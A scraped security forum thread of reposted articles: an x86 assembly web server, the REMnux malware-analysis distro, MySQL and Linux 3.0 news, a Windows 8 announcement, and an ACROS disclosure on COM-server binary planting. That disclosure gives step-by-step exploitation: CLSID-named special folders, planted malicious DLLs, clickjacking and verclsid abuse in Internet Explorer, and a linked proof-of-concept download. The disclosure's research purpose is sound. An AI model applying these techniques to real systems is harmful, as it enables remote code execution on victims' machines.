INVOKE StrCmp,offset RSBuf,offset Get .IF eax==1 ;If command other than GET, ignore. INVOKE closesocket,wParam xor eax,eax ret .ENDIF pop edi mov BYTE PTR[edi],32 INVOKE Cut,offset RSBuf,offset Buf2,4,32 INVOKE RemoveHex,offset Buf2,offset Buf1 INVOKE StrLen,offset Buf1 mov ecx,eax mov edi,offset Buf1 ;Make sure there is no ../ mov al,"." @@@7: repnz scasb jnz @@@8 cmp BYTE PTR[edi],"." jnz @@@7 cmp BYTE PTR[edi+1],"/" jnz @@@7 jmp Bad @@@8: mov Exist,0 ;Must determine request type dec edi .IF BYTE PTR[edi]=="/" ;Therefore, directory INVOKE StrCpy,offset Buf1,offset Buf3 INVOKE SendDlgItemMessage,hWnd,1000,WM_GETTEXT,512,offset Path INVOKE StrCpy,offset Path,offset Buf2 INVOKE StrCat,offset Buf2,offset Buf1 INVOKE SendDlgItemMessage,hDlg,1002,BM_GETCHECK,0,0 .IF eax==0 INVOKE StrCat,offset Buf2,offset DefName jmp Index .ENDIF INVOKE wsprintfA,offset Buf1,offset Msg200,offset HTML,30000 INVOKE StrLen,offset Buf1 INVOKE send,wParam,offset Buf1,eax,0 ;Send header INVOKE StrLen,offset Str0 INVOKE send,wParam,offset Str0,eax,0 INVOKE StrLen,offset Buf2 INVOKE send,wParam,offset Buf2,eax,0 INVOKE StrLen,offset Str1 INVOKE send,wParam,offset Str1,eax,0 INVOKE StrCat,offset Buf2,offset Star ;Get files INVOKE FillList,0,wParam INVOKE FillList,16,wParam INVOKE closesocket,wParam ;Done sending listing inc Exist .ELSE ;File INVOKE SendDlgItemMessage,hWnd,1000,WM_GETTEXT,512,offset Path INVOKE StrCpy,offset Path,offset Buf2 INVOKE StrCat,offset Buf2,offset Buf1 Index: INVOKE GetFileAttributes,offset Buf2 cmp eax,-1 jz Bad ;File doesn't exist and eax,16 .IF eax!=0 ;File was actually a directory, without a /. INVOKE InsertHex,offset Buf1,offset Buf2 INVOKE StrLen,offset Buf2 lea ebx,Buf2 ;So, redirect add eax,ebx mov BYTE PTR[eax],"/" mov BYTE PTR[eax+1],0 INVOKE wsprintf,offset Buf1,offset Redir,offset Buf2 INVOKE StrLen,offset Buf1 INVOKE send,wParam,offset Buf1,eax,0 INVOKE closesocket,wParam xor eax,eax ret .ENDIF INVOKE CreateFile,offset Buf2,GENERIC_READ,0,0,OPEN_EXISTING,0,0 mov hFile,eax INVOKE GetFileSize,hFile,0 mov FSize,eax INVOKE Ext INVOKE Resuming ;Check for range and if resume sending mov eax,FOffset .IF RFlag==0 INVOKE wsprintfA,offset Buf1,offset Msg200,pType,FSize .ELSE mov ebx,FSize sub FSize,eax mov ecx,ebx dec ecx INVOKE wsprintfA,offset Buf1,offset Msg206,pType,FOffset,ecx, ebx,FSize .ENDIF INVOKE StrLen,offset Buf1 INVOKE send,wParam,offset Buf1,eax,0 INVOKE GlobalAlloc,0,FSize ;Get memory to store file mov hMem,eax ;for sending. INVOKE GlobalLock,hMem mov pMem,eax INVOKE SetFilePointer,hFile,FOffset,0,FILE_BEGIN INVOKE ReadFile,hFile,pMem,FSize,offset NotUsed,0 INVOKE send,wParam,pMem,FSize,0 INVOKE GlobalUnlock,hMem INVOKE GlobalFree,hMem INVOKE closesocket,wParam INVOKE CloseHandle,hFile ;Done with file and socket too. inc Exist .ENDIF .IF Exist==0 Bad: INVOKE StrLen,offset Msg404 ;Bad request. Send 404 error. INVOKE send,wParam,offset Msg404,eax,0 INVOKE closesocket,wParam .ENDIF .ELSEIF ax==FD_CLOSE INVOKE closesocket,wParam .ENDIF .ELSE INVOKE DefWindowProc,hWnd,uMsg,wParam,lParam ret .ENDIF xor eax,eax ret WndProc endp Cut PROC SRC:DWORD,DST:DWORD,OS:DWORD,EC:BYTE mov eax,OS add SRC,eax mov al,EC mov ecx,-1 mov edi,SRC repnz scasb not ecx dec ecx .IF ecx>1010 ;Buffer overflow: Truncate (414) mov ecx,1020 .ENDIF mov esi,SRC mov edi,DST rep movsb mov BYTE PTR[edi],0 ret Cut ENDP StrLen PROC SRC:DWORD mov ecx,-1 mov edi,SRC mov al,0 repnz scasb mov eax,ecx not eax dec eax ret StrLen ENDP StrCpy proc SRC:LPSTR,DST:LPSTR INVOKE StrLen,SRC add eax,2 mov ecx,eax mov esi,SRC mov edi,DST rep movsb ret StrCpy endp StrCat proc S1:DWORD,S2:DWORD INVOKE StrLen,S2 add eax,2 push eax INVOKE StrLen,S1 mov edi,S1 add edi,eax mov esi,S2 pop ecx rep movsb ret StrCat endp StrCmp PROC SRC:DWORD,DST:DWORD INVOKE StrLen,SRC inc eax mov ecx,eax mov esi,SRC mov edi,DST repz cmpsb mov eax,1 jnz Next ;zf set or not from repz dec eax Next: ret StrCmp endp Ext PROC lea esi,Buf2 mov ebx,esi @0: lodsb ;Search string for '.', ending at 0. .IF al=="." mov ebx,esi .ENDIF cmp al,0 jnz @0 dec ebx ;Open Registry to look for MIME type for extension. INVOKE RegOpenKeyEx,HKEY_CLASSES_ROOT,ebx,0,KEY_READ,offset hReg cmp eax,0 jnz @1 ;Get MIME type mov BufSize,1024 INVOKE RegQueryValueEx,hReg,offset Content,0,0,offset Buf4,offset BufSize cmp eax,0 jnz @1 ;Done with Registry INVOKE RegCloseKey,hReg lea eax,Buf4 mov pType,eax ret @1: ;If not found, return default. INVOKE RegCloseKey,hReg lea eax,Type0 mov pType,eax ret Ext ENDP Resuming PROC ;Set FOffset mov FOffset,0 mov RFlag,0 lea esi,RSBuf lea edi,Range @2: mov ch,[esi] .IF ch<91 && ch>64 ;Lower case add ch,32 .ENDIF .IF [edi]==ch ;Look for substring inc edi cmp BYTE PTR[edi],0 jz @3 .ELSE lea edi,Range .ENDIF inc esi cmp BYTE PTR[esi],0 jnz @2 ret @3: add esi,2 ;Turn string at [esi] into value in eax. xor eax,eax ;Only works for "Range: bytes=x-" format xor ebx,ebx mov ecx,10 mov RFlag,1 @4: mov bl,[esi] sub bl,48 inc esi .IF bl<10 mul ecx add eax,ebx jmp @4 .ENDIF mov FOffset,eax ret Resuming ENDP FillList PROC DirF:DWORD,hSck:DWORD INVOKE SendDlgItemMessage,hDlg,1001,LB_RESETCONTENT,0,0 INVOKE FindFirstFile,offset Buf2,offset fd .IF eax==-1 ret .ENDIF mov hFind,eax @@@1: mov eax,fd.dwFileAttributes and eax,16 ;Show directories if DirF .IF eax==DirF xor eax,eax .IF fd.cFileName=="." .IF fd.cFileName[1]==0 || (fd.cFileName[1]=="." && fd.cFileName[2]==0) inc eax .ENDIF .ENDIF .IF eax==0 INVOKE SendDlgItemMessage,hDlg,1001,LB_ADDSTRING,0, offset fd.cFileName .ENDIF .ENDIF INVOKE FindNextFile,hFind,offset fd cmp eax,1 jz @@@1 INVOKE FindClose,hFind INVOKE SendDlgItemMessage,hDlg,1001,LB_GETCOUNT,0,0 .IF eax==0 ret .ENDIF mov Count,eax .IF DirF==16 lea edx,Str3 .ELSE lea edx,Str2 .ENDIF INVOKE StrLen,edx INVOKE send,hSck,edx,eax,0 mov pType,0 @@@2: INVOKE StrLen,offset Str4 ;Send hyperlink to file INVOKE send,hSck,offset Str4,eax,0 INVOKE SendDlgItemMessage,hDlg,1001,LB_GETTEXT,pType,offset Buf1 .IF DirF==16 ;Add / to directories mov edx,offset Buf1 INVOKE StrLen,edx add eax,edx mov BYTE PTR[eax],"/" inc eax mov BYTE PTR[eax],0 .ENDIF INVOKE InsertHex,offset Buf1,offset Buf3 INVOKE StrLen,offset Buf3 INVOKE send,hSck,offset Buf3,eax,0 INVOKE StrLen,offset Str5 INVOKE send,hSck,offset Str5,eax,0 INVOKE StrLen,offset Buf1 INVOKE send,hSck,offset Buf1,eax,0 INVOKE StrLen,offset Str6 INVOKE send,hSck,offset Str6,eax,0 inc pType mov eax,Count cmp pType,eax jnz @@@2 ret FillList ENDP RemoveHex PROC SRC:DWORD,DST:DWORD mov esi,SRC dec esi mov edi,DST xor eax,eax @@@3: inc esi mov al,[esi] .IF al=="\" mov al,"/" .ENDIF .IF al==0 stosb ret .ENDIF .IF al=="%" INVOKE FromHex,[esi+1] .IF al==-1 mov al,"%" stosb jmp @@@3 .ENDIF mov bl,al INVOKE FromHex,[esi+2] .IF al==-1 mov al,"%" stosb jmp @@@3 .ENDIF shl bl,4 add al,bl add esi,2 .ENDIF stosb jmp @@@3 RemoveHex ENDP InsertHex PROC SRC:DWORD,DST:DWORD mov esi,SRC dec esi mov edi,DST xor eax,eax @@@4: inc esi mov al,[esi] .IF al==0 stosb ret .ENDIF .IF al<"(" || al>"~" mov dl,al mov al,"%" stosb mov al,dl shr al,4 .IF al<10 add al,48 .ELSE add al,55 .ENDIF stosb mov al,dl and al,15 .IF al<10 add al,48 .ELSE add al,55 .ENDIF .ENDIF stosb jmp @@@4 InsertHex ENDP FromHex PROC Char:BYTE mov al,Char .IF al>="0" && al<="9" sub al,48 ret .ENDIF .IF al>="a" && al<="f" sub al,87 ret .ENDIF .IF al>="A" && al<="F" sub al,55 ret .ENDIF mov al,-1 ret FromHex ENDP end program (source site: http://lingcog.iit.edu/~scubed/projects.xml) Read more: http://www.intel-assembler.it/portale/5/cinchy-x86-web-server/a-basic-asm-web-server.asp#ixzz1ODJlDs1q Sursa: Cinchy Assembly Web Server - An efficient and simple web server written in x86
  16. Nytro
    REMnux: A Linux Distribution for Reverse-Engineering Malware REMnux is a lightweight Linux distribution for assisting malware analysts in reverse-engineering malicious software. The distribution is based on Ubuntu and is maintained by Lenny Zeltser. About REMnux REMnux is designed for running services that are useful to emulate within an isolated laboratory environment when performing behavioral malware analysis. As part of this process, the analyst typically infects another laboratory system with the malware sample and directs potentially-malicious connections to the REMnux system that's listening on the appropriate ports. REMnux is also useful for analyzing web-based malware, such as malicious JavaScript, Java programs, and Flash files. It also has tools for analyzing malicious documents, such as Microsoft Office and Adobe PDF files, and utilities for reversing malware through memory forensics. In these cases, malware may be loaded onto REMnux and analyzed directly on the REMnux system without requiring other systems to be present in the lab. You can learn about malware analysis techniques that make use of the tools installed and pre-configured on REMnux by taking my course on Reverse-Engineering Malware (REM) at SANS Institute. Originally released in 2010, REMnux has been updated to version 2 in 2011. What REMnux Is Not REMnux isn't a fancy distribution that was built from scratch... In simple terms, it's trimmed-down version of Ubuntu and has various useful malware tools set up on it. REMnux does not aim to include all malware analysis tools in existence. Many of these tools are designed to work on Windows, and investigators prefer to use Windows systems for running such tools. If you are interested in running Windows analysis tools on a Linux platform, take a look at the Zero Wine project. If you are looking for a more full-featured Linux distribution focused on forensic analysis, take a look at SANS Investigative Forensic Toolkit (SIFT) Workstation. Downloading REMnux You can download the REMnux distribution as a VMware virtual appliance archive and also as an ISO image of a Live CD. MD5 has values of the latest files are: VMware virtual appliance archive: remnux-vm-public-2.0.zip (MD5 hash A9AD4B6F85E89A5E20A5FB1E8E18A49A). ISO image of a Live CD: remnux-public-2.0-live-cd.iso (MD5 hash CD30284948A1160C2ADD6FD07D4349FA). Questions on and Improvements to REMnux Do you have recommendations for making REMnux more useful? If so, please let me know. You can contact me via email through my website or via Twitter. You're welcome to get in touch with me if you have questions regarding using REMnux. Another, and sometimes faster, option is to use the REMnux discussion forum on SourceForge. Malware Analysis Tools Set Up On REMnux Analyzing Flash malware: swftools, flasm, flare, RABCDAsm Analyzing IRC bots: IRC server (Inspire IRCd) and clients (Irssi, ircII). To launch the IRC server, type "ircd start"; to shut it down "ircd stop". To launch the IRC client, type "irc". Network-monitoring and interactions: Wireshark, Honeyd, INetSim, fakedns and fakesmtp scripts, NetCat JavaScript deobfuscation: Firefox with Firebug, NoScript and JavaScript Deobfuscator extensions, Rhino debugger, two versions of patched SpiderMonkey, Windows Script Decoder, Jsunpack-n Interacting with web malware: TinyHTTPd, Paros proxy, Burp Suite Free Edition, stunnel, VirusTotal VTzilla, User Agent Switcher, Tor and torsocks with "usewithtor"). To launch the Tor daemon, type "tor start"; to shut it down "tor stop". Analyzing shellcode: gdb, objdump, Radare (hex editor+disassembler), shellcode2exe, libemu with "sctest", diStorm disassembler library Dealing with suspicious files: upx, packerid, bytehist, xorsearch, TRiD, xortools.py, ClamAV, ssdeep, md5deep, pescanner.py Malicious document file analysis: Didier's PDF tools, Origami framework, Jsunpack-n, pdftk, pyOLEScanner.py Memory forensics: Volatility Framework with malware.py, AESKeyFinder and RSAKeyFinder. Miscellaneous: unzip, strings, feh image viewer, SciTE text editor, OpenSSH server, VBinDiff file comparison/viewer. Sursa si detalii: REMnux: A Linux Distribution for Reverse-Engineering Malware
  17. Nytro
    begood e moderator Sunt planuri si pentru alte persoane, dar momentan, cel putin cateva zile, lista va ramane aceasta. Apoi vedem, in functie de cum vor posta persoanele "pending".
  18. Nytro
    MySQL 5.5: Storage Engine Performance Benchmark for MyISAM and InnoDB Incepand cu MySQL v5.5, InnoDB e databse engine-ul implicit. S-a lucrat mult la el si a fost imbunatatit foarte mult. Un lucru important e ca InnoDB respecta proprietatile ACID (atomicity, consistency, isolation, durability) - ceea ce asigura ca tranzactiile sunt procesate asa cum trebuie, de exemplu exista crash recovery. De asemenea s-a lucrat la "partea de Windows", adica au fost facute optimizari pentru Windows, se folosesc functii native Windows, de exemplu pentru alocari de memorie sau altceva, ceea ce inseamna viteza sportia. Setarile de configurare InnoDB iti permit sa selectezi cate thread-uri sa fie folosite, cate pentru citire si cate pentru scriere, sa folosesti alocatori de memorie specifici sistemului de operare... Diferente ar mai fi: InnoDB are suport pentru Foreign Key (important) si lock la nivel de celula, nu la nivel de tabel, dar MyISAM suporta full text search indexes. Practic InnoDB e mai rapid.
  19. Nytro
    Linux Kernel Moves to 3.0 For No Reason Numbers are Just Numbers and in the Linux Kernel they Mean Nothing By Stephen Spector on Wed, 06/01/11 - 3:18pm. This past Monday Linus Torvalds released the first release candidate (-rc) of the next kernel series, which was expected to be 2.6.40, but instead renamed it to Linux 3.0 kernel. From Linus’ commit statement (http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=55922c9d1b84b89cb946c777fddccb3247e7df2c): .. except there are various scripts that really know that there are three numbers, so it calls itself "3.0.0-rc1". Hopefully by the time the final 3.0 is out, we'll have that extra zero all figured out. So, what does this mean? Are there significant new features in 3.0 that justify a numbering switch from2.6.40 to 3.0? To find out more, we can read Linus’ mail to the kernel mailing list (https://lkml.org/lkml/2011/5/29/204): I decided to just bite the bullet, and call the next version 3.0. It will get released close enough to the 20-year mark, which is excuse enough for me, although honestly, the real reason is just that I can no longer comfortably count as high as 40. The whole renumbering was discussed at last years Kernel Summit, and there was a plan to take it up this year too. But let's face it - what's the point of being in charge if you can't pick the bike shed color without holding a referendum on it? So I'm just going all alpha-male, and just renumbering it. You'll like it. Now, my alpha-maleness sadly does not actually extend to all the scripts and Makefile rules, so the kernel is fighting back, and is calling itself 3.0.0-rc1. We'll have the usual 6-7 weeks to wrestle it into submission, and get scripts etc cleaned up, and the final release should be just "3.0". The -stable team can use the third number for their versioning. In fact, Linus goes on to say the number change is not based on anything from a feature standpoint; it’s just a number change. This type of change is most interesting as it goes against standard practices with software numbering conventions and once again shows Linus as a leader in the software space with his willingness to defy conventional wisdom. I find this change interesting but am not really sure how it impacts anyone. The kernel used in most distributions is always listed but I believe that most users look for the latest version of any distro and will go with whatever kernel they use, regardless of numbering scheme. However, with a numbering scheme not based on any standard, could we see companies in the future release version 22.0 as an initial product causing people not aware that this is the 22nd iteration and therefore better than version 1.0? I’m sure a marketing person somewhere is contemplating this. What do you think? Is Linus simply changing the number for no reason as he states? Is there a grand conspiracy behind this change that no one knows about? Perhaps Microsoft is behind this change and is now controlling Linus’ mind. Sursa: Open Source Exposed: Linux Kernel Moves to 3.0 For No Reason
  20. Nytro
    The Anatomy of COM Server-Based Binary Planting Exploits Tuesday, May 24, 2011 Last week at the Hack In The Box conference in Amsterdam we presented some techniques for advanced exploitation of binary planting bugs. The stage was set by our previous blog post where we described how unsafely registered COM server DLLs, as well as safely registered COM server DLLs that make unsafe binary loading calls, could be abused for mounting binary planting attacks. This post reveals our work to the rest of the world. The Magic Of Special Folders One of the elements we used in our exploits were Windows special folders. Special folders are folders that can be shown by Windows Explorer but don't always behave like ordinary folders, which simply contain files and other folders. Some examples of special folders are Control Panel, My Computer, My Documents, Administrative Tools and Printers. Every one of these special folders is implemented as an in-process COM server with a specific class identifier (CLSID). For instance, the CLSID of My Computer is {20D04FE0-3AEA-1069-A2D8-08002B30309D}. Let's begin with a small magic trick (works on XP, Vista and Windows 7): Create a new empty folder anywhere on your file system and rename it to folder.{20D04FE0-3AEA-1069-A2D8-08002B30309D}. (Note that the CLSID must be the extension of the folder name, i.e., must come after the final dot.) Immediately after renaming, the folder's icon will be changed to the icon of My Computer and, moreover, opening the folder will actually show the My Computer content. Apart from having an obvious entertaining value, this trick also plays an important role in our exploits. Many applications, when processing files from special folders, or display the content of special folders, trigger the instantiation of such folders' COM servers based on the CLSIDs in their extensions. Which brings us to the first exploit. Double-Click Attack 1: Wordpad on Windows XP As already mentioned in our stage-setting blog post, all Windows XP installations have a registered COM server called "Display Panning CPL Extension" with CLSID {42071714-76d4-11d1-8b24-00a0c9068ff3}, implemented by a non-existing deskpan.dll. Consequently, if some application decided to instantiate such COM server, this would result in loading deskpan.dll from the current working directory. As you might have guessed, the special folders magic can make an application instantiate just any registered COM server. Let's do this with Wordpad. The video below shows the following procedure: create a "malicious" deskpan.dll; create a new folder and rename it to files.{42071714-76d4-11d1-8b24-00a0c9068ff3} - note that Windows XP hide the folder extension, and that this special folder still behaves like an ordinary folder; copy the malicious deskpan.dll to the new folder; open the folder; create a new rich text document in the folder; double-click the rich-text document. http://www.youtube.com/watch?feature=player_embedded&v=SzW8xCsHOuY After double-clicking the rich text document, Wordpad gets launched and its current working directory gets set to the special folder (which is the expected behavior). However, for reasons unknown to us, Wordpad then triggers a call to the COM server-instantiating function CoCreateInstance with the CLSID of our special folder. This causes a registry lookup for the COM server DLL (deskpan.dll), and then an attempt to load this DLL using a LoadLibrary call. Failing to find this DLL in Wordpad home directory as well as in all Windows system folders, the "malicious" deskpan.dll is finally loaded from our special folder and executed. Double-Click Attack 2: Applications on Windows 7 In contrast to Windows XP, a fresh installation of Windows 7 has no unsafely registered in-process COM servers. It does, however, have several safely registered COM servers whose DLLs make unsafe library loading calls. (XP and Vista have such DLLs too.) One such case on Windows 7 is the COM server called "AnalogCable Class", registered with CLSID {2E095DD0-AF56-47E4-A099-EAC038DECC24} and having C:\Windows\System32\PsisDecd.dll as its DLL. When an application instantiates this COM server, the PsisDecd.dll is loaded from the System32 folder (which is okay), but this DLL quickly makes a call to LoadLibrary("ehTrace.dll"). Now it's not that ehTrace.dll doesn't exist on Windows 7: it does exist in folder C:\Windows\ehome - but applications launched outside this folder are unable to find it. This means that applications from folder C:\Windows\ehome, for instance ehshell.exe, can safely and successfully instantiate the said COM server, while other applications automatically become vulnerable if they try to do the same. The video shows the following procedure: create a "malicious" ehTrace.dll; create a new Microsoft Word 2010 document; create a new Microsoft PowerPoint 2010 document; create a new text document; create a new PDF document; create a new folder and rename it to files.{2E095DD0-AF56-47E4-A099-EAC038DECC24} - note that Windows 7 also hide the folder extension, and that this special folder still behaves like an ordinary folder; copy all four data files and the "malicious" DLL to the new folder; open the folder; double-click the Word document; (causing Word 2010 to execute the "malicious" ehTrace.dll) double-click the PowerPoint document; (causing PowerPoint 2010 to execute the "malicious" ehTrace.dll) double-click the PDF document; (causing Nitro PDF Reader to execute the "malicious" ehTrace.dll) double-click the text document; (launching Notepad but not immediately executing the "malicious" DLL) selecting "File -> Save As" from the menu in Notepad. (causing Notepad to execute the "malicious" ehTrace.dll) http://www.youtube.com/watch?feature=player_embedded&v=H82gaZizl-0 Similarly to the Wordpad exploit on Windows XP, the above exploits are based on the curious and heavily undocumented nature of special folders, which makes otherwise innocent applications instantiate chosen COM servers. Thus Word, PowerPoint and Nitro PDF Reader (and many other applications) all try to instantiate the "AnalogCable Class" COM server while having their current working directory set to our special folder. This results in a search for ehTrace.dll, and in the loading of "malicious" ehTrace.dll from our special folder. The final target, Notepad, does not get hacked simply by opening a file - but does execute the "malicious" DLL when the "Save As" dialog is opened. Apparently Notepad does not automatically trigger the COM server instantiation when a document is loaded, but opening the "Save As" dialog causes the code behind this dialog to interact with the special folder, thus instantiating the appropriate COM server. Leveraging COM Server Exploits Through Web Browsers Skeptics among you may say that, okay, this opens up new attack vectors for various binary planting vulnerabilities, but the user would still have to double-click a document on a remote share. And users wouldn't do that, would they? (Of course they would but let's pretend they wouldn't.) So in order to satisfy the most demanding among you, we leveraged the above exploits through web browsers, resulting in some pretty user-friendly scenarios, in a manner of speaking. Let's start with Windows XP and Internet Explorer 8. Web Attack 1: Internet Explorer 8 on Windows XP The following video shows how a user would experience the attack. Visiting a malicious web site, clicking once on one link, and again on another, is enough to get a remote binary executed on his computer. http://www.youtube.com/watch?v=uU3KVsO8Ca4&feature=player_embedded Two tricks are employed in the background of this attack. The first is aimed at launching applications without double-clicking. One of the methods we found for this makes use of the default Windows XP Task View, i.e., the task list shown in Windows Explorer on the left of each folder view. When a printable document is selected in the folder, this task list includes the "Print this file" link which, when (single-) clicked upon, launches the application associated with the file type of the selected file and instructs it to initiate the printing process. The procedure is thus: 1) click the file in a remote special folder to select it, and 2) click "Print to file" to launch the application which then loads a malicious DLL. The second trick is clickjacking. This old trick is simply used for hiding the actual attack inside a 1x1 iframe such that wherever the user clicks on the web page the first time (anywhere on the page, not only on links), he actually clicks inside this tiny iframe - precisely on the Wordpad document shown in a remote shared folder, thereby selecting this document. The iframe then repositions its remote content such that when the user clicks again, he actually clicks on the "Print this file" link in the same remote shared folder as before, thereby launching Wordpad and executing the malicious DLL inside it. Now, since most attackers want to hide their attacks as much as possible, we made the demo such that when the user clicks inside the tiny iframe, we detect that and simulate the click on the underlying web page as well, which is why the links apparently clicked on actually respond to the clicks. For those of you preferring the schematic diagrams, here's how it works in the language of objects, arrows and annotations (taken from our Hack In The Box slides). Web Attack 2: Internet Explorer 9 on Windows 7 With Protected Mode We've already seen that applications can be made vulnerable through unsafe COM servers on Windows 7 just like on Windows XP. But there are two additional challenges here. First, Windows 7 don't have the task view like Windows XP do, so another way to avoid double-clicking had to be found. And second, you can't just launch any application from IE when in protected mode without popping up the yellow security warning. For the first challenge we chose to reveal a "right-click, send to compressed (zipped) folder" trick. IE allows the user to right-click a folder inside a remote shared folder (without a warning), and then select "send to" and "compressed (zipped) folder" from the context menu. This triggers a process of compression, which sets the current working directory of IE to the remote shared folder - and completes the first part of the attack. The second challenge was overcome with the help of verclsid.exe. This curious little executable, mostly unknown to users, gets frequently launched in the background and quickly terminates without any visible effect. Verclsid.exe is, ironically, a security measure introduced by a Windows security update associated with bulletin MS06-015, but to us it is interesting because it is "whitelisted" for the IE protected mode: when IE launches a new verclsid.exe process, the user doesn't have to okay a security warning. Furthermore, verclsid.exe instantiates the COM server associated with the extension of a chosen special folder, providing just the binary planting opportunity we need. In our attack, we trigger the launching of verclsid.exe by loading a number of different special folders in an additional 1x1 iframe while IE has its current working directory set to our remote shared folder. Since verclsid.exe is launched by IE, it also inherits IE's current working directory (which hosts our "malicious" DLL) and eventually loads our DLL. The attack is again hidden with clickjacking. Let's see how the user experiences this attack. Visiting a malicious web site, right-clicking anywhere on the page and selecting "send to" and "compressed (zipped) folder" from the context menu is enough to get a remote binary executed on his computer. http://www.youtube.com/watch?v=dydN_KhQnhs&feature=player_embedded Again, the schematic diagram of the attack: Lessons Learned The main takeaway from our presentation was that binary planting, as a conceptual problem with loading binaries on Windows, is not at all a trivial problem if you really understand the numerous details and hidden processes that affect and enable it. By shedding light on a few previously unknown attack vectors we only revealed a small portion of our advanced binary planting research, which is aimed at improving the exploitation of various binary planting vulnerabilities. If we want to convince developers to fix security defects, we need to show them that they're easy to exploit, and we hope to see some proactive effort as a result of our work. And this is by no means aimed towards Microsoft alone; it was simply easiest for us to use the components that come with Windows, but we found a large number of other vendors' product to be exploitable in the ways described above. How To Protect Yourself? Apart from our generic recommendations for administrators, a couple of additional temporary measures will protect you from the attacks described in this post (but unfortunately not from numerous similar attacks): On Windows XP, delete the {42071714-76d4-11d1-8b24-00a0c9068ff3} registry key under HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID. On Windows 7, copy ehTrace.dll from C:\Windows\ehome to the System32 folder. What's next? We'll continue to raise awareness of this vulnerability class we call binary planting. There's a lot of misunderstanding about it among developers as well as security researchers, and we'll do our best to change that. Our first humble milestone is to stop seeing new product versions making unsafe LoadLibrary calls. Unfortunately, we don't seem to be anywhere close to that. (Again, most of the above research has been done by Luka Treiber, security researcher at ACROS Security.) COM Server-Based Binary Planting Proof Of Concept Released For educational purposes we decided to publish a proof of concept (PoC) for the COM Server-Based Binary Planting attacks described in our previous post. We prepared both online and offline versions for 32-bit Windows XP running Internet Explorer 8. Visit XP 2-click Binary Planting PoC and follow instructions. You must have WebDAV communication with the Internet enabled and must not have the CWDIllegalInDllSearch hotfix installed. Offline Proof of Concept Download a ZIP archive of the PoC here, extract it and follow the instructions in readme.txt. You can test the PoC either from a local network share or locally on a single Windows XP machine. Note that this is a proof of concept only, not a weaponized exploit. The reliability thus depends on a few factors: You have to be running Internet Explorer 8 on 32-bit Windows XP (although it probably works on IE 7 too). A weaponized exploit could automatically detect user's Windows and IE version and provide an exploit for 32-bit and 64-bit XP, Vista or Windows 7 accordingly. You have to have "Show common tasks in folders" selected under the "Folder options" in Windows Explorer. (This is the default setting.) A weaponized exploit could use various attack vectors for different user configurations. The automatic COM Server launching process in relation with special folders is largely undocumented and can be unpredictable. A weaponized exploit could initiate various special folders-related activities for further improving the reliability. The SMB-to-WebDAV fallback takes a while (usually 10-15 seconds in our tests) and our PoC requires you to wait. A weaponized exploit could initiate this communication in the background while the user was reading an interesting text from the web page. Poc: http://www.binaryplanting.com/demo/XP_2-click/XP_2-click.zip Surse: ACROS Security Blog: The Anatomy of COM Server-Based Binary Planting Exploits COM Server-Based Binary Planting Proof Of Concept Released | HITBSecNews
  21. Nytro
    Previewing "Windows 8" Article by Julie Larson-Green, corporate vice president, Windows Experience. REDMOND, Wash. – June 1, 2011 – Today, at the D9 Conference, we demonstrated the next generation of Windows, internally code-named “Windows 8,” for the first time. Windows 8 is a reimagining of Windows, from the chip to the interface. A Windows 8-based PC is really a new kind of device, one that scales from touch-only small screens through to large screens, with or without a keyboard and mouse. The demo showed some of the ways we’ve reimagined the interface for a new generation of touch-centric hardware. Fast, fluid and dynamic, the experience has been transformed while keeping the power, flexibility and connectivity of Windows intact. Here are a few aspects of the new interface we showed today: Fast launching of apps from a tile-based Start screen, which replaces the Windows Start menu with a customizable, scalable full-screen view of apps. Live tiles with notifications, showing always up-to-date information from your apps. Fluid, natural switching between running apps. Convenient ability to snap and resize an app to the side of the screen, so you can really multitask using the capabilities of Windows. Web-connected and Web-powered apps built using HTML5 and JavaScript that have access to the full power of the PC. Fully touch-optimized browsing, with all the power of hardware-accelerated Internet Explorer 10. We also showed effortless movement between existing Windows programs and new Windows 8 apps. The full capabilities of Windows continue to be available to you, including the Windows Explorer and Desktop, as does compatibility with all Windows 7 logo PCs, software and peripherals. Although the new user interface is designed and optimized for touch, it works equally well with a mouse and keyboard. Our approach means no compromises — you get to use whatever kind of device you prefer, with peripherals you choose, to run the apps you love. This is sure to inspire a new generation of hardware and software development, improving the experience for PC users around the world. Today, we also talked a bit about how developers will build apps for the new system. Windows 8 apps use the power of HTML5, tapping into the native capabilities of Windows using standard JavaScript and HTML to deliver new kinds of experiences. These new Windows 8 apps are full-screen and touch-optimized, and they easily integrate with the capabilities of the new Windows user interface. There’s much more to the platform, capabilities and tools than we showed today. We are excited to bring an innovative new platform and tools to developers and see how their creativity jumpstarts a new generation of apps. Windows 8 apps can use a broad set of new libraries and controls, designed for fluid interaction and seamless connectivity. Apps can add new capabilities to Windows and to other apps, connecting with one another through the new interface. For example, we showed today how a developer can extend the file picker control to enable picking from their own app content or from within another Windows 8 app, in addition to the local file system and the network. We’re just getting started. And this isn’t just about touch PCs. The new Windows experience will ultimately be powered by application and device developers around the world — one experience across a tremendous variety of PCs. The user interface and new apps will work with or without a keyboard and mouse on a broad range of screen sizes and pixel densities, from small slates to laptops, desktops, all-in-ones, and even classroom-sized displays. Hundreds of millions of PCs will run the new Windows 8 user interface. This breadth of hardware choice is unique to Windows and central to how we see Windows evolving. The video below introduces a few of the basic elements of the new user interface. Although we have much more to reveal at our developer event, BUILD (Sept. 13 - 16 in Anaheim, Calif.), we’re excited to share our progress with you. Today’s demonstration followed our announcements earlier this year about Windows 8 running on System on a Chip (SoC) processors, and our browser engine innovations and significantly increased standards support in Internet Explorer 10. Windows 8 extends these innovations and reimagines every level of the Windows architecture — the kernel, networking, storage, devices, user interface — all building on the broadest and richest ecosystem of software, peripherals and devices. We have so much more on the way! We’re working very hard to get the product ready for early testing, and we plan to kick off our engineering dialogue through our team blog, just as we did for Windows 7. So please stay tuned — we have a lot of cool innovation coming in the months ahead. By Julie Larson-Green Corporate Vice President, Windows Experience Video: Download video: http://media.ch9.ms/ch9/cda16b03-c463-47e7-b604-9ef5011c5b25/Demo.mp4 Sursa: http://www.microsoft.com/presspass/features/2011/jun11/06-01corporatenews.aspx
  22. Nytro

    FaceNiff

    Nytro posted a topic in Programe hacking

